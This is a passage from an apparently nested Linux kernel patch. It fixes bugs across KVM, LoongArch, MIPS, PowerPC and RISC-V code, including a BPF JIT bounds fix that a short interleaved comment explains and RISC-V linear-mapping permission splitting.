++		irq->pending_latch = test_bit(i, &val);
++
++		if (irq->hw && vgic_irq_is_sgi(irq->intid)) {
++			irq_set_irqchip_state(irq->host_irq,
++					      IRQCHIP_STATE_PENDING,
++					      irq->pending_latch);
+ 			irq->pending_latch = false;
+-			raw_spin_unlock_irqrestore(&irq->irq_lock, flags);
+ 		}
+ 
++		if (irq->pending_latch)
++			vgic_queue_irq_unlock(vcpu->kvm, irq, flags);
++		else
++			raw_spin_unlock_irqrestore(&irq->irq_lock, flags);
++
+ 		vgic_put_irq(vcpu->kvm, irq);
+ 	}
+ 
+diff --git a/arch/csky/include/asm/jump_label.h b/arch/csky/include/asm/jump_label.h
+index d488ba6084bc6..98a3f4b168bd2 100644
+--- a/arch/csky/include/asm/jump_label.h
++++ b/arch/csky/include/asm/jump_label.h
+@@ -43,5 +43,10 @@ label:
+ 	return true;
+ }
+ 
++enum jump_label_type;
++void arch_jump_label_transform_static(struct jump_entry *entry,
++				      enum jump_label_type type);
++#define arch_jump_label_transform_static arch_jump_label_transform_static
++
+ #endif  /* __ASSEMBLY__ */
+ #endif	/* __ASM_CSKY_JUMP_LABEL_H */
+diff --git a/arch/loongarch/include/asm/elf.h b/arch/loongarch/include/asm/elf.h
+index 9b16a3b8e7060..f16bd42456e4c 100644
+--- a/arch/loongarch/include/asm/elf.h
++++ b/arch/loongarch/include/asm/elf.h
+@@ -241,8 +241,6 @@ void loongarch_dump_regs64(u64 *uregs, const struct pt_regs *regs);
+ do {									\
+ 	current->thread.vdso = &vdso_info;				\
+ 									\
+-	loongarch_set_personality_fcsr(state);				\
+-									\
+ 	if (personality(current->personality) != PER_LINUX)		\
+ 		set_personality(PER_LINUX);				\
+ } while (0)
+@@ -259,7 +257,6 @@ do {									\
+ 	clear_thread_flag(TIF_32BIT_ADDR);				\
+ 									\
+ 	current->thread.vdso = &vdso_info;				\
+-	loongarch_set_personality_fcsr(state);				\
+ 									\
+ 	p = personality(current->personality);				\
+ 	if (p != PER_LINUX32 && p != PER_LINUX)				\
+@@ -340,6 +337,4 @@ extern int arch_elf_pt_proc(void *ehdr, void *phdr, struct file *elf,
+ extern int arch_check_elf(void *ehdr, bool has_interpreter, void *interp_ehdr,
+ 			  struct arch_elf_state *state);
+ 
+-extern void loongarch_set_personality_fcsr(struct arch_elf_state *state);
+-
+ #endif /* _ASM_ELF_H */
+diff --git a/arch/loongarch/kernel/elf.c b/arch/loongarch/kernel/elf.c
+index 183e94fc9c69c..0fa81ced28dcd 100644
+--- a/arch/loongarch/kernel/elf.c
++++ b/arch/loongarch/kernel/elf.c
+@@ -23,8 +23,3 @@ int arch_check_elf(void *_ehdr, bool has_interpreter, void *_interp_ehdr,
+ {
+ 	return 0;
+ }
+-
+-void loongarch_set_personality_fcsr(struct arch_elf_state *state)
+-{
+-	current->thread.fpu.fcsr = boot_cpu_data.fpu_csr0;
+-}
+diff --git a/arch/loongarch/kernel/process.c b/arch/loongarch/kernel/process.c
+index 90a5de7463326..1259bc3129790 100644
+--- a/arch/loongarch/kernel/process.c
++++ b/arch/loongarch/kernel/process.c
+@@ -82,6 +82,7 @@ void start_thread(struct pt_regs *regs, unsigned long pc, unsigned long sp)
+ 	euen = regs->csr_euen & ~(CSR_EUEN_FPEN);
+ 	regs->csr_euen = euen;
+ 	lose_fpu(0);
++	current->thread.fpu.fcsr = boot_cpu_data.fpu_csr0;
+ 
+ 	clear_thread_flag(TIF_LSX_CTX_LIVE);
+ 	clear_thread_flag(TIF_LASX_CTX_LIVE);
+diff --git a/arch/loongarch/net/bpf_jit.c b/arch/loongarch/net/bpf_jit.c
+index 40ed49d9adff5..4e86441e63196 100644
+--- a/arch/loongarch/net/bpf_jit.c
++++ b/arch/loongarch/net/bpf_jit.c
+@@ -402,7 +402,6 @@ static int build_insn(const struct bpf_insn *insn, struct jit_ctx *ctx, bool ext
+ 	const u8 dst = regmap[insn->dst_reg];
+ 	const s16 off = insn->off;
+ 	const s32 imm = insn->imm;
+-	const u64 imm64 = (u64)(insn + 1)->imm << 32 | (u32)insn->imm;
+ 	const bool is32 = BPF_CLASS(insn->code) == BPF_ALU || BPF_CLASS(insn->code) == BPF_JMP32;
+ 
+ 	switch (code) {
+@@ -806,8 +805,12 @@ static int build_insn(const struct bpf_insn *insn, struct jit_ctx *ctx, bool ext
+ 
+ 	/* dst = imm64 */
+ 	case BPF_LD | BPF_IMM | BPF_DW:
++	{
++		const u64 imm64 = (u64)(insn + 1)->imm << 32 | (u32)insn->imm;
++
+ 		move_imm(ctx, dst, imm64, is32);
+ 		return 1;
++	}
+ 
+ 	/* dst = *(size *)(src + off) */
+ 	case BPF_LDX | BPF_MEM | BPF_B:
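
The point of moving imm64 into the BPF_LD | BPF_IMM | BPF_DW case is bounds safety: that opcode is the only one occupying two instruction slots, so dereferencing insn + 1 unconditionally, as the deleted line did, reads one element past the program whenever any other opcode comes last. A standalone sketch of the two-slot encoding; the struct and values below are illustrative:

    #include <stdint.h>
    #include <stdio.h>

    /* Stand-in for struct bpf_insn: BPF_LD | BPF_IMM | BPF_DW spans two
     * consecutive slots, each carrying half of the 64-bit constant. */
    struct insn { int32_t imm; };

    static uint64_t read_imm64(const struct insn *insn)
    {
    	/* Valid only for the first slot of a two-slot load; for any
    	 * other opcode, insn + 1 may lie past the last instruction. */
    	return (uint64_t)(insn + 1)->imm << 32 | (uint32_t)insn->imm;
    }

    int main(void)
    {
    	struct insn prog[2] = { { .imm = 0x55667788 }, { .imm = 0x11223344 } };

    	printf("0x%016llx\n", (unsigned long long)read_imm64(prog));
    	/* prints 0x1122334455667788 */
    	return 0;
    }
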
+diff --git a/arch/mips/alchemy/devboards/db1200.c b/arch/mips/alchemy/devboards/db1200.c
+index f521874ebb07b..67f067706af27 100644
+--- a/arch/mips/alchemy/devboards/db1200.c
++++ b/arch/mips/alchemy/devboards/db1200.c
+@@ -847,7 +847,7 @@ int __init db1200_dev_setup(void)
+ 	i2c_register_board_info(0, db1200_i2c_devs,
+ 				ARRAY_SIZE(db1200_i2c_devs));
+ 	spi_register_board_info(db1200_spi_devs,
+-				ARRAY_SIZE(db1200_i2c_devs));
++				ARRAY_SIZE(db1200_spi_devs));
+ 
+ 	/* SWITCHES:	S6.8 I2C/SPI selector  (OFF=I2C	 ON=SPI)
+ 	 *		S6.7 AC97/I2S selector (OFF=AC97 ON=I2S)
+diff --git a/arch/mips/alchemy/devboards/db1550.c b/arch/mips/alchemy/devboards/db1550.c
+index fd91d9c9a2525..6c6837181f555 100644
+--- a/arch/mips/alchemy/devboards/db1550.c
++++ b/arch/mips/alchemy/devboards/db1550.c
+@@ -589,7 +589,7 @@ int __init db1550_dev_setup(void)
+ 	i2c_register_board_info(0, db1550_i2c_devs,
+ 				ARRAY_SIZE(db1550_i2c_devs));
+ 	spi_register_board_info(db1550_spi_devs,
+-				ARRAY_SIZE(db1550_i2c_devs));
++				ARRAY_SIZE(db1550_spi_devs));
+ 
+ 	c = clk_get(NULL, "psc0_intclk");
+ 	if (!IS_ERR(c)) {
+diff --git a/arch/mips/include/asm/dmi.h b/arch/mips/include/asm/dmi.h
+index 27415a288adf5..dc397f630c660 100644
+--- a/arch/mips/include/asm/dmi.h
++++ b/arch/mips/include/asm/dmi.h
+@@ -5,7 +5,7 @@
+ #include <linux/io.h>
+ #include <linux/memblock.h>
+ 
+-#define dmi_early_remap(x, l)		ioremap_cache(x, l)
++#define dmi_early_remap(x, l)		ioremap(x, l)
+ #define dmi_early_unmap(x, l)		iounmap(x)
+ #define dmi_remap(x, l)			ioremap_cache(x, l)
+ #define dmi_unmap(x)			iounmap(x)
+diff --git a/arch/mips/kernel/setup.c b/arch/mips/kernel/setup.c
+index 7c540572f1f72..e46e7ec76b4f4 100644
+--- a/arch/mips/kernel/setup.c
++++ b/arch/mips/kernel/setup.c
+@@ -326,11 +326,11 @@ static void __init bootmem_init(void)
+ 		panic("Incorrect memory mapping !!!");
+ 
+ 	if (max_pfn > PFN_DOWN(HIGHMEM_START)) {
++		max_low_pfn = PFN_DOWN(HIGHMEM_START);
+ #ifdef CONFIG_HIGHMEM
+-		highstart_pfn = PFN_DOWN(HIGHMEM_START);
++		highstart_pfn = max_low_pfn;
+ 		highend_pfn = max_pfn;
+ #else
+-		max_low_pfn = PFN_DOWN(HIGHMEM_START);
+ 		max_pfn = max_low_pfn;
+ #endif
+ 	}
+diff --git a/arch/mips/kernel/smp.c b/arch/mips/kernel/smp.c
+index 1d93b85271ba8..002c91fcb842e 100644
+--- a/arch/mips/kernel/smp.c
++++ b/arch/mips/kernel/smp.c
+@@ -333,10 +333,11 @@ early_initcall(mips_smp_ipi_init);
+  */
+ asmlinkage void start_secondary(void)
+ {
+-	unsigned int cpu;
++	unsigned int cpu = raw_smp_processor_id();
+ 
+ 	cpu_probe();
+ 	per_cpu_trap_init(false);
++	rcu_cpu_starting(cpu);
+ 	mips_clockevent_init();
+ 	mp_ops->init_secondary();
+ 	cpu_report();
+@@ -348,7 +349,6 @@ asmlinkage void start_secondary(void)
+ 	 */
+ 
+ 	calibrate_delay();
+-	cpu = smp_processor_id();
+ 	cpu_data[cpu].udelay_val = loops_per_jiffy;
+ 
+ 	set_cpu_sibling_map(cpu);
+diff --git a/arch/powerpc/Kconfig b/arch/powerpc/Kconfig
+index 6050e6e10d321..2c94f9cf1ce00 100644
+--- a/arch/powerpc/Kconfig
++++ b/arch/powerpc/Kconfig
+@@ -806,6 +806,7 @@ config THREAD_SHIFT
+ 	int "Thread shift" if EXPERT
+ 	range 13 15
+ 	default "15" if PPC_256K_PAGES
++	default "15" if PPC_PSERIES || PPC_POWERNV
+ 	default "14" if PPC64
+ 	default "13"
+ 	help
+diff --git a/arch/powerpc/Makefile b/arch/powerpc/Makefile
+index 054844153b1fd..487e4967b60d2 100644
+--- a/arch/powerpc/Makefile
++++ b/arch/powerpc/Makefile
+@@ -42,18 +42,13 @@ machine-$(CONFIG_PPC64) += 64
+ machine-$(CONFIG_CPU_LITTLE_ENDIAN) += le
+ UTS_MACHINE := $(subst $(space),,$(machine-y))
+ 
+-# XXX This needs to be before we override LD below
+-ifdef CONFIG_PPC32
+-KBUILD_LDFLAGS_MODULE += arch/powerpc/lib/crtsavres.o
+-else
+-ifeq ($(call ld-ifversion, -ge, 22500, y),y)
++ifeq ($(CONFIG_PPC64)$(CONFIG_LD_IS_BFD),yy)
+ # Have the linker provide sfpr if possible.
+ # There is a corresponding test in arch/powerpc/lib/Makefile
+ KBUILD_LDFLAGS_MODULE += --save-restore-funcs
+ else
+ KBUILD_LDFLAGS_MODULE += arch/powerpc/lib/crtsavres.o
+ endif
+-endif
+ 
+ ifdef CONFIG_CPU_LITTLE_ENDIAN
+ KBUILD_CFLAGS	+= -mlittle-endian
+@@ -391,17 +386,7 @@ endif
+ endif
+ 
+ PHONY += checkbin
+-# Check toolchain versions:
+-# - gcc-4.6 is the minimum kernel-wide version so nothing required.
+ checkbin:
+-	@if test "x${CONFIG_LD_IS_LLD}" != "xy" -a \
+-		"x$(call ld-ifversion, -le, 22400, y)" = "xy" ; then \
+-		echo -n '*** binutils 2.24 miscompiles weak symbols ' ; \
+-		echo 'in some circumstances.' ; \
+-		echo    '*** binutils 2.23 do not define the TOC symbol ' ; \
+-		echo -n '*** Please use a different binutils version.' ; \
+-		false ; \
+-	fi
+ 	@if test "x${CONFIG_FTRACE_MCOUNT_USE_RECORDMCOUNT}" = "xy" -a \
+ 		"x${CONFIG_LD_IS_BFD}" = "xy" -a \
+ 		"${CONFIG_LD_VERSION}" = "23700" ; then \
+diff --git a/arch/powerpc/lib/Makefile b/arch/powerpc/lib/Makefile
+index 8560c912186df..9b394bab17eba 100644
+--- a/arch/powerpc/lib/Makefile
++++ b/arch/powerpc/lib/Makefile
+@@ -42,8 +42,8 @@ obj-$(CONFIG_FUNCTION_ERROR_INJECTION)	+= error-inject.o
+ # 64-bit linker creates .sfpr on demand for final link (vmlinux),
+ # so it is only needed for modules, and only for older linkers which
+ # do not support --save-restore-funcs
+-ifeq ($(call ld-ifversion, -lt, 22500, y),y)
+-extra-$(CONFIG_PPC64)	+= crtsavres.o
++ifndef CONFIG_LD_IS_BFD
++always-$(CONFIG_PPC64)	+= crtsavres.o
+ endif
+ 
+ obj-$(CONFIG_PPC_BOOK3S_64) += copyuser_power7.o copypage_power7.o \
+diff --git a/arch/powerpc/perf/imc-pmu.c b/arch/powerpc/perf/imc-pmu.c
+index ada817c49b722..56d82f7f9734e 100644
+--- a/arch/powerpc/perf/imc-pmu.c
++++ b/arch/powerpc/perf/imc-pmu.c
+@@ -299,6 +299,8 @@ static int update_events_in_group(struct device_node *node, struct imc_pmu *pmu)
+ 	attr_group->attrs = attrs;
+ 	do {
+ 		ev_val_str = kasprintf(GFP_KERNEL, "event=0x%x", pmu->events[i].value);
++		if (!ev_val_str)
++			continue;
+ 		dev_str = device_str_attr_create(pmu->events[i].name, ev_val_str);
+ 		if (!dev_str)
+ 			continue;
+@@ -306,6 +308,8 @@ static int update_events_in_group(struct device_node *node, struct imc_pmu *pmu)
+ 		attrs[j++] = dev_str;
+ 		if (pmu->events[i].scale) {
+ 			ev_scale_str = kasprintf(GFP_KERNEL, "%s.scale", pmu->events[i].name);
++			if (!ev_scale_str)
++				continue;
+ 			dev_str = device_str_attr_create(ev_scale_str, pmu->events[i].scale);
+ 			if (!dev_str)
+ 				continue;
+@@ -315,6 +319,8 @@ static int update_events_in_group(struct device_node *node, struct imc_pmu *pmu)
+ 
+ 		if (pmu->events[i].unit) {
+ 			ev_unit_str = kasprintf(GFP_KERNEL, "%s.unit", pmu->events[i].name);
++			if (!ev_unit_str)
++				continue;
+ 			dev_str = device_str_attr_create(ev_unit_str, pmu->events[i].unit);
+ 			if (!dev_str)
+ 				continue;
+diff --git a/arch/powerpc/platforms/44x/Kconfig b/arch/powerpc/platforms/44x/Kconfig
+index 25b80cd558f8d..fc79f84669335 100644
+--- a/arch/powerpc/platforms/44x/Kconfig
++++ b/arch/powerpc/platforms/44x/Kconfig
+@@ -173,6 +173,7 @@ config ISS4xx
+ config CURRITUCK
+ 	bool "IBM Currituck (476fpe) Support"
+ 	depends on PPC_47x
++	select I2C
+ 	select SWIOTLB
+ 	select 476FPE
+ 	select FORCE_PCI
+diff --git a/arch/powerpc/platforms/powernv/opal-irqchip.c b/arch/powerpc/platforms/powernv/opal-irqchip.c
+index d55652b5f6fa4..391f505352007 100644
+--- a/arch/powerpc/platforms/powernv/opal-irqchip.c
++++ b/arch/powerpc/platforms/powernv/opal-irqchip.c
+@@ -275,6 +275,8 @@ int __init opal_event_init(void)
+ 		else
+ 			name = kasprintf(GFP_KERNEL, "opal");
+ 
++		if (!name)
++			continue;
+ 		/* Install interrupt handler */
+ 		rc = request_irq(r->start, opal_interrupt, r->flags & IRQD_TRIGGER_MASK,
+ 				 name, NULL);
+diff --git a/arch/powerpc/platforms/powernv/opal-powercap.c b/arch/powerpc/platforms/powernv/opal-powercap.c
+index 7bfe4cbeb35a9..ea917266aa172 100644
+--- a/arch/powerpc/platforms/powernv/opal-powercap.c
++++ b/arch/powerpc/platforms/powernv/opal-powercap.c
+@@ -196,6 +196,12 @@ void __init opal_powercap_init(void)
+ 
+ 		j = 0;
+ 		pcaps[i].pg.name = kasprintf(GFP_KERNEL, "%pOFn", node);
++		if (!pcaps[i].pg.name) {
++			kfree(pcaps[i].pattrs);
++			kfree(pcaps[i].pg.attrs);
++			goto out_pcaps_pattrs;
++		}
++
+ 		if (has_min) {
+ 			powercap_add_attr(min, "powercap-min",
+ 					  &pcaps[i].pattrs[j]);
+diff --git a/arch/powerpc/platforms/powernv/opal-xscom.c b/arch/powerpc/platforms/powernv/opal-xscom.c
+index 6b4eed2ef4fa9..f67235d1ba2c5 100644
+--- a/arch/powerpc/platforms/powernv/opal-xscom.c
++++ b/arch/powerpc/platforms/powernv/opal-xscom.c
+@@ -165,6 +165,11 @@ static int scom_debug_init_one(struct dentry *root, struct device_node *dn,
+ 	ent->chip = chip;
+ 	snprintf(ent->name, 16, "%08x", chip);
+ 	ent->path.data = (void *)kasprintf(GFP_KERNEL, "%pOF", dn);
++	if (!ent->path.data) {
++		kfree(ent);
++		return -ENOMEM;
++	}
++
+ 	ent->path.size = strlen((char *)ent->path.data);
+ 
+ 	dir = debugfs_create_dir(ent->name, root);
+diff --git a/arch/powerpc/platforms/pseries/hotplug-memory.c b/arch/powerpc/platforms/pseries/hotplug-memory.c
+index 2e3a317722a81..051a777ba1b27 100644
+--- a/arch/powerpc/platforms/pseries/hotplug-memory.c
++++ b/arch/powerpc/platforms/pseries/hotplug-memory.c
+@@ -500,14 +500,15 @@ static int dlpar_memory_remove_by_index(u32 drc_index)
+ 		}
+ 	}
+ 
+-	if (!lmb_found)
++	if (!lmb_found) {
++		pr_debug("Failed to look up LMB for drc index %x\n", drc_index);
+ 		rc = -EINVAL;
+-
+-	if (rc)
++	} else if (rc) {
+ 		pr_debug("Failed to hot-remove memory at %llx\n",
+ 			 lmb->base_addr);
+-	else
++	} else {
+ 		pr_debug("Memory at %llx was hot-removed\n", lmb->base_addr);
++	}
+ 
+ 	return rc;
+ }
+diff --git a/arch/riscv/include/asm/sections.h b/arch/riscv/include/asm/sections.h
+index 32336e8a17cb0..a393d5035c543 100644
+--- a/arch/riscv/include/asm/sections.h
++++ b/arch/riscv/include/asm/sections.h
+@@ -13,6 +13,7 @@ extern char _start_kernel[];
+ extern char __init_data_begin[], __init_data_end[];
+ extern char __init_text_begin[], __init_text_end[];
+ extern char __alt_start[], __alt_end[];
++extern char __exittext_begin[], __exittext_end[];
+ 
+ static inline bool is_va_kernel_text(uintptr_t va)
+ {
+diff --git a/arch/riscv/include/asm/xip_fixup.h b/arch/riscv/include/asm/xip_fixup.h
+index d4ffc3c37649f..b65bf6306f69c 100644
+--- a/arch/riscv/include/asm/xip_fixup.h
++++ b/arch/riscv/include/asm/xip_fixup.h
+@@ -13,7 +13,7 @@
+         add \reg, \reg, t0
+ .endm
+ .macro XIP_FIXUP_FLASH_OFFSET reg
+-	la t1, __data_loc
++	la t0, __data_loc
+ 	REG_L t1, _xip_phys_offset
+ 	sub \reg, \reg, t1
+ 	add \reg, \reg, t0
+diff --git a/arch/riscv/kernel/module.c b/arch/riscv/kernel/module.c
+index 91fe16bfaa07c..a331001e33e66 100644
+--- a/arch/riscv/kernel/module.c
++++ b/arch/riscv/kernel/module.c
+@@ -424,7 +424,8 @@ void *module_alloc(unsigned long size)
+ {
+ 	return __vmalloc_node_range(size, 1, MODULES_VADDR,
+ 				    MODULES_END, GFP_KERNEL,
+-				    PAGE_KERNEL, 0, NUMA_NO_NODE,
++				    PAGE_KERNEL, VM_FLUSH_RESET_PERMS,
++				    NUMA_NO_NODE,
+ 				    __builtin_return_address(0));
+ }
+ #endif
+diff --git a/arch/riscv/kernel/patch.c b/arch/riscv/kernel/patch.c
+index e099961453cca..160e5c1caa9c4 100644
+--- a/arch/riscv/kernel/patch.c
++++ b/arch/riscv/kernel/patch.c
+@@ -13,6 +13,7 @@
+ #include <asm/fixmap.h>
+ #include <asm/ftrace.h>
+ #include <asm/patch.h>
++#include <asm/sections.h>
+ 
+ struct patch_insn {
+ 	void *addr;
+@@ -23,6 +24,14 @@ struct patch_insn {
+ int riscv_patch_in_stop_machine = false;
+ 
+ #ifdef CONFIG_MMU
++
++static inline bool is_kernel_exittext(uintptr_t addr)
++{
++	return system_state < SYSTEM_RUNNING &&
++		addr >= (uintptr_t)__exittext_begin &&
++		addr < (uintptr_t)__exittext_end;
++}
++
+ /*
+  * The fix_to_virt(, idx) needs a const value (not a dynamic variable of
+  * reg-a0) or BUILD_BUG_ON failed with "idx >= __end_of_fixed_addresses".
+@@ -33,7 +42,7 @@ static __always_inline void *patch_map(void *addr, const unsigned int fixmap)
+ 	uintptr_t uintaddr = (uintptr_t) addr;
+ 	struct page *page;
+ 
+-	if (core_kernel_text(uintaddr))
++	if (core_kernel_text(uintaddr) || is_kernel_exittext(uintaddr))
+ 		page = phys_to_page(__pa_symbol(addr));
+ 	else if (IS_ENABLED(CONFIG_STRICT_MODULE_RWX))
+ 		page = vmalloc_to_page(addr);
+diff --git a/arch/riscv/kernel/vmlinux-xip.lds.S b/arch/riscv/kernel/vmlinux-xip.lds.S
+index 75e0fa8a700ae..24a2fdd3be6a0 100644
+--- a/arch/riscv/kernel/vmlinux-xip.lds.S
++++ b/arch/riscv/kernel/vmlinux-xip.lds.S
+@@ -29,10 +29,12 @@ SECTIONS
+ 	HEAD_TEXT_SECTION
+ 	INIT_TEXT_SECTION(PAGE_SIZE)
+ 	/* we have to discard exit text and such at runtime, not link time */
++	__exittext_begin = .;
+ 	.exit.text :
+ 	{
+ 		EXIT_TEXT
+ 	}
++	__exittext_end = .;
+ 
+ 	.text : {
+ 		_text = .;
+diff --git a/arch/riscv/kernel/vmlinux.lds.S b/arch/riscv/kernel/vmlinux.lds.S
+index 4e6c88aa4d870..d478e063b8785 100644
+--- a/arch/riscv/kernel/vmlinux.lds.S
++++ b/arch/riscv/kernel/vmlinux.lds.S
+@@ -72,10 +72,12 @@ SECTIONS
+ 		__soc_builtin_dtb_table_end = .;
+ 	}
+ 	/* we have to discard exit text and such at runtime, not link time */
++	__exittext_begin = .;
+ 	.exit.text :
+ 	{
+ 		EXIT_TEXT
+ 	}
++	__exittext_end = .;
+ 
+ 	__init_text_end = .;
+ 	. = ALIGN(SECTION_ALIGN);
+diff --git a/arch/riscv/mm/pageattr.c b/arch/riscv/mm/pageattr.c
+index ea3d61de065b3..9587e44874152 100644
+--- a/arch/riscv/mm/pageattr.c
++++ b/arch/riscv/mm/pageattr.c
+@@ -5,6 +5,7 @@
+ 
+ #include <linux/pagewalk.h>
+ #include <linux/pgtable.h>
++#include <linux/vmalloc.h>
+ #include <asm/tlbflush.h>
+ #include <asm/bitops.h>
+ #include <asm/set_memory.h>
+@@ -25,19 +26,6 @@ static unsigned long set_pageattr_masks(unsigned long val, struct mm_walk *walk)
+ 	return new_val;
+ }
+ 
+-static int pageattr_pgd_entry(pgd_t *pgd, unsigned long addr,
+-			      unsigned long next, struct mm_walk *walk)
+-{
+-	pgd_t val = READ_ONCE(*pgd);
+-
+-	if (pgd_leaf(val)) {
+-		val = __pgd(set_pageattr_masks(pgd_val(val), walk));
+-		set_pgd(pgd, val);
+-	}
+-
+-	return 0;
+-}
+-
+ static int pageattr_p4d_entry(p4d_t *p4d, unsigned long addr,
+ 			      unsigned long next, struct mm_walk *walk)
+ {
+@@ -96,7 +84,6 @@ static int pageattr_pte_hole(unsigned long addr, unsigned long next,
+ }
+ 
+ static const struct mm_walk_ops pageattr_ops = {
+-	.pgd_entry = pageattr_pgd_entry,
+ 	.p4d_entry = pageattr_p4d_entry,
+ 	.pud_entry = pageattr_pud_entry,
+ 	.pmd_entry = pageattr_pmd_entry,
+@@ -104,12 +91,181 @@ static const struct mm_walk_ops pageattr_ops = {
+ 	.pte_hole = pageattr_pte_hole,
+ };
+ 
++#ifdef CONFIG_64BIT
++static int __split_linear_mapping_pmd(pud_t *pudp,
++				      unsigned long vaddr, unsigned long end)
++{
++	pmd_t *pmdp;
++	unsigned long next;
++
++	pmdp = pmd_offset(pudp, vaddr);
++
++	do {
++		next = pmd_addr_end(vaddr, end);
++
++		if (next - vaddr >= PMD_SIZE &&
++		    vaddr <= (vaddr & PMD_MASK) && end >= next)
++			continue;
++
++		if (pmd_leaf(*pmdp)) {
++			struct page *pte_page;
++			unsigned long pfn = _pmd_pfn(*pmdp);
++			pgprot_t prot = __pgprot(pmd_val(*pmdp) & ~_PAGE_PFN_MASK);
++			pte_t *ptep_new;
++			int i;
++
++			pte_page = alloc_page(GFP_KERNEL);
++			if (!pte_page)
++				return -ENOMEM;
++
++			ptep_new = (pte_t *)page_address(pte_page);
++			for (i = 0; i < PTRS_PER_PTE; ++i, ++ptep_new)
++				set_pte(ptep_new, pfn_pte(pfn + i, prot));
++
++			smp_wmb();
++
++			set_pmd(pmdp, pfn_pmd(page_to_pfn(pte_page), PAGE_TABLE));
++		}
++	} while (pmdp++, vaddr = next, vaddr != end);
++
++	return 0;
++}
++
++static int __split_linear_mapping_pud(p4d_t *p4dp,
++				      unsigned long vaddr, unsigned long end)
++{
++	pud_t *pudp;
++	unsigned long next;
++	int ret;
++
++	pudp = pud_offset(p4dp, vaddr);
++
++	do {
++		next = pud_addr_end(vaddr, end);
++
++		if (next - vaddr >= PUD_SIZE &&
++		    vaddr <= (vaddr & PUD_MASK) && end >= next)
++			continue;
++
++		if (pud_leaf(*pudp)) {
++			struct page *pmd_page;
++			unsigned long pfn = _pud_pfn(*pudp);
++			pgprot_t prot = __pgprot(pud_val(*pudp) & ~_PAGE_PFN_MASK);
++			pmd_t *pmdp_new;
++			int i;
++
++			pmd_page = alloc_page(GFP_KERNEL);
++			if (!pmd_page)
++				return -ENOMEM;
++
++			pmdp_new = (pmd_t *)page_address(pmd_page);
++			for (i = 0; i < PTRS_PER_PMD; ++i, ++pmdp_new)
++				set_pmd(pmdp_new,
++					pfn_pmd(pfn + ((i * PMD_SIZE) >> PAGE_SHIFT), prot));
++
++			smp_wmb();
++
++			set_pud(pudp, pfn_pud(page_to_pfn(pmd_page), PAGE_TABLE));
++		}
++
++		ret = __split_linear_mapping_pmd(pudp, vaddr, next);
++		if (ret)
++			return ret;
++	} while (pudp++, vaddr = next, vaddr != end);
++
++	return 0;
++}
++
++static int __split_linear_mapping_p4d(pgd_t *pgdp,
++				      unsigned long vaddr, unsigned long end)
++{
++	p4d_t *p4dp;
++	unsigned long next;
++	int ret;
++
++	p4dp = p4d_offset(pgdp, vaddr);
++
++	do {
++		next = p4d_addr_end(vaddr, end);
++
++		/*
++		 * If [vaddr; end] contains [vaddr & P4D_MASK; next], we don't
++		 * need to split, we'll change the protections on the whole P4D.
++		 */
++		if (next - vaddr >= P4D_SIZE &&
++		    vaddr <= (vaddr & P4D_MASK) && end >= next)
++			continue;
++
++		if (p4d_leaf(*p4dp)) {
++			struct page *pud_page;
++			unsigned long pfn = _p4d_pfn(*p4dp);
++			pgprot_t prot = __pgprot(p4d_val(*p4dp) & ~_PAGE_PFN_MASK);
++			pud_t *pudp_new;
++			int i;
++
++			pud_page = alloc_page(GFP_KERNEL);
++			if (!pud_page)
++				return -ENOMEM;
++
++			/*
++			 * Fill the pud level with leaf puds that have the same
++			 * protections as the leaf p4d.
++			 */
++			pudp_new = (pud_t *)page_address(pud_page);
++			for (i = 0; i < PTRS_PER_PUD; ++i, ++pudp_new)
++				set_pud(pudp_new,
++					pfn_pud(pfn + ((i * PUD_SIZE) >> PAGE_SHIFT), prot));
++
++			/*
++			 * Make sure the pud filling is not reordered with the
++			 * p4d store which could result in seeing a partially
++			 * filled pud level.
++			 */
++			smp_wmb();
++
++			set_p4d(p4dp, pfn_p4d(page_to_pfn(pud_page), PAGE_TABLE));
++		}
++
++		ret = __split_linear_mapping_pud(p4dp, vaddr, next);
++		if (ret)
++			return ret;
++	} while (p4dp++, vaddr = next, vaddr != end);
++
++	return 0;
++}
++
++static int __split_linear_mapping_pgd(pgd_t *pgdp,
++				      unsigned long vaddr,
++				      unsigned long end)
++{
++	unsigned long next;
++	int ret;
++
++	do {
++		next = pgd_addr_end(vaddr, end);
++		/* We never use PGD mappings for the linear mapping */
++		ret = __split_linear_mapping_p4d(pgdp, vaddr, next);
++		if (ret)
++			return ret;
++	} while (pgdp++, vaddr = next, vaddr != end);
++
++	return 0;
++}
++
++static int split_linear_mapping(unsigned long start, unsigned long end)
++{
++	return __split_linear_mapping_pgd(pgd_offset_k(start), start, end);
++}
++#endif	/* CONFIG_64BIT */
++
+ static int __set_memory(unsigned long addr, int numpages, pgprot_t set_mask,
+ 			pgprot_t clear_mask)
+ {
+ 	int ret;
+ 	unsigned long start = addr;
+ 	unsigned long end = start + PAGE_SIZE * numpages;
++	unsigned long __maybe_unused lm_start;
++	unsigned long __maybe_unused lm_end;
+ 	struct pageattr_masks masks = {
+ 		.set_mask = set_mask,
+ 		.clear_mask = clear_mask
+@@ -119,11 +275,72 @@ static int __set_memory(unsigned long addr, int numpages, pgprot_t set_mask,
+ 		return 0;
+ 
+ 	mmap_write_lock(&init_mm);
++
++#ifdef CONFIG_64BIT
++	/*
++	 * We are about to change the permissions of a kernel mapping, we must
++	 * apply the same changes to its linear mapping alias, which may imply
++	 * splitting a huge mapping.
++	 */
++
++	if (is_vmalloc_or_module_addr((void *)start)) {
++		struct vm_struct *area = NULL;
++		int i, page_start;
++
++		area = find_vm_area((void *)start);
++		page_start = (start - (unsigned long)area->addr) >> PAGE_SHIFT;
++
++		for (i = page_start; i < page_start + numpages; ++i) {
++			lm_start = (unsigned long)page_address(area->pages[i]);
++			lm_end = lm_start + PAGE_SIZE;
++
++			ret = split_linear_mapping(lm_start, lm_end);
++			if (ret)
++				goto unlock;
++
++			ret = walk_page_range_novma(&init_mm, lm_start, lm_end,
++						    &pageattr_ops, NULL, &masks);
++			if (ret)
++				goto unlock;
++		}
++	} else if (is_kernel_mapping(start) || is_linear_mapping(start)) {
++		if (is_kernel_mapping(start)) {
++			lm_start = (unsigned long)lm_alias(start);
++			lm_end = (unsigned long)lm_alias(end);
++		} else {
++			lm_start = start;
++			lm_end = end;
++		}
++
++		ret = split_linear_mapping(lm_start, lm_end);
++		if (ret)
++			goto unlock;
++
++		ret = walk_page_range_novma(&init_mm, lm_start, lm_end,
++					    &pageattr_ops, NULL, &masks);
++		if (ret)
++			goto unlock;
++	}
++
+ 	ret =  walk_page_range_novma(&init_mm, start, end, &pageattr_ops, NULL,
+ 				     &masks);
++
++unlock:
++	mmap_write_unlock(&init_mm);
++
++	/*
++	 * We can't use flush_tlb_kernel_range() here as we may have split a
